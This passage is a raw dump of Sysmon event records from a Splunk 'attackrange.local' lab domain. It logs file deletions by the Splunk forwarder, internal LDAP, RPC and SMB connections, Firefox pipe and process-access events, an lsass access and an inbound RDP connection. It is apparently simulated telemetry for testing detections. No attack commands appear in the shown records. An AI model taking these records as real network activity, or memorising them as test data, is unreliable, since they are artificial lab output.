Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51121-false10.0.1.12-8000- 23542300x80000000000000001051807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:02.707{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D86805F12F3F3010785F275C5183CC5,SHA256=4F802CE3DA5AE629588B15D417D72873E4BE69E921F3A60BC626A61D958D0C52,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808785Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:01.354{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57352-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808784Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:02.191{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BFFB5DFB77C9499161BFC1C0D990F9A,SHA256=6A900F37F43AE574BA40574CE07E550E30712DECC014152FAA783FA09D6A87DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:54.509{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-37235-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 
23542300x80000000000000001051805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:02.292{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77334E5D64BE719D3B888CA9F74005B4,SHA256=2E808354CBCF8AFD80A47896152AAA08DB718B19535D9178694BAED8FF583E80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:02.292{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6417BBC462E8736C31128766BE356338,SHA256=EB2773DB5ECFF545C2CE8942DDD9FF9B9AFFF9FE59A264920F445F2F53F4FC53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:03.722{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEA05CCAFE838EC1859A990202057EFD,SHA256=D01D97DA4E75BE8B6271DBCECD2EA9F8B6D860E0E67220E2B4611A06C0B13842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808786Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:03.206{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C51DD248C502D05632F5FAFE28DBB18D,SHA256=F2EF0FC9ED87AA9B7A2193B9067FF8B655F1C3736543E26F6D0F63BA67FD22A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.740{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0B7E9D6FB62614F3C8871318F448E97,SHA256=5E4E0E735AD50FB27CC81975323CF79ABA4E2855FA0F4322EC0E05D776C6CDD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808787Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:04.206{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6118404AA84F3165E65BBA792DF6535A,SHA256=FFE0B9F44C6B23B2E17A71CE9BA563C85C69E85B716631CCC34A4BD7A7335450,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:05.759{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C37A6F3B0D4E7A1BAD1B320271FC0DB4,SHA256=8F2BEDEDF3DC7563AB428C196B912464DA89627A64657A3114F4E6848EFD6B7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808788Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:05.206{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E376113B9E79BBE0B55DAAC9B31589C0,SHA256=A537E5B10139B848F0851C6A9B4AB7F9D4A67DE93471BD5EABB4442C36DF2D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:06.765{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44BF5A541B9F292B93E1BA5A90008766,SHA256=7C5B3A019A9A74B093E4C485B618B56D0BC378ADD44648B8CEC773961492395A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808789Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:06.222{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E18CBD014F3F8679FB7C640F69186BC0,SHA256=169DA37A243B76BC4A97C2FB2BC10AED311765E369E81283098183E282E94315,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:06.348{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001051814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:06.292{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001051813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:06.292{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla 
Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001051812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:59:06.292{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1215.197509028C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001051811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:59:06.292{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1215.197509028C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001051818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:07.768{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58077D3369A7C89F98A6D112D01541FE,SHA256=775494E748C4242A191A5FD809F88AE8733F34E97CDFB2F7E745E82052ACDC1E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808790Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:07.238{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FA1274F49E9EE5C22EDD23747187E17,SHA256=B51D5C26085E9394C6971A9E4AD9CAFCC9B26659E1510D23E8C524CD5810C22F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:58.710{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51122-false10.0.1.12-8000- 23542300x80000000000000001051820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:08.769{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BE18DAF5D458A229FB3C8C3F2BA3939,SHA256=907440AC45457E57EDAE12A798DDB26DA7A60F689BCF4248CCCA2E6281AE4923,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808792Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:07.214{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57353-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808791Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:08.253{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00F5937374161A33AF8134F7F1A2E259,SHA256=D2CFAAD170BA1F59268D73FA068C72E6BCC729E6032841C4FFB9A28DA62E5C31,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:59.829{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local54060- 23542300x80000000000000001051822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:09.784{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA385241433F1FB5261F67F6D659FB0A,SHA256=FC7EE6AA6841F697870DF0002D6BBBC543E6BFD5771F33E64F8D6C6A382123FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808793Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:09.284{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ED539ADC28E53730A07E16AE091E289,SHA256=FF96D02554C14E9C021C011956A1954E0084403634AF8E192E87B2FF2CB9816C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:59.832{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local59513- 23542300x80000000000000001051823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:10.799{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EC9D60D98A60887132165F500EC0A32,SHA256=5FD8A5FDDAA8748D0AD296E278BC7CB4F7E82CF5061EEC657D986D91796A368A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808794Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:10.284{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B92B322289C34B8E14ED56B8D14429F5,SHA256=30C42E18A48C9CEA8CC3E86AF240163D2BB96A025099C77F08533664E2D4F30D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808795Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:11.316{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F908B32DBD3B83458947FDE22E0DC175,SHA256=693DAC4997942C843D67509D8EA565894A0068916CB344B45A0B2B146F0E0ADF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:11.800{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D35B0BFB33173018F98CFDA97A2009D2,SHA256=90C10905DC42C05DC548C30870F9A1B7F92158C8ACAF1DB06D762EDE58B9C966,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:11.253{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001051842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:12.814{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=380D8380E3EB3195A785FC57ED985404,SHA256=B1569097BD93B718536C94B52AA26D5C7E963F2CDB0351F474F1F112774B2F3A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808796Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:12.363{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6814344F52CCD11EC4C516C90741571B,SHA256=338C3C5F5188ECEC9E4B3F598E61C44C498999D1E530EFCC3DDBBEFD75DE5E27,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.792{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51130-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001051840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.789{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51129-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001051839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.789{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51129-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001051838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.788{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51128-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 
354300x80000000000000001051837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.788{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51128-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001051836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.688{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local51127-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001051835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.688{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51127-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001051834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.682{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51126-false10.0.1.12-8000- 354300x80000000000000001051833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.670{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51125-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001051832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.670{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT 
AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51125-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001051831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.670{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51124-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001051830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.670{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51124-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001051829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.668{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51123-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001051828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.668{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51123-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 23542300x80000000000000001051827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:12.168{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60940E08F13BD691933FA56FB3A83246,SHA256=7A7EA7800CA9ABAAC12222844AE0AB28DB1372066375FED2BD18ED3B11F0EB27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:12.168{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77334E5D64BE719D3B888CA9F74005B4,SHA256=2E808354CBCF8AFD80A47896152AAA08DB718B19535D9178694BAED8FF583E80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 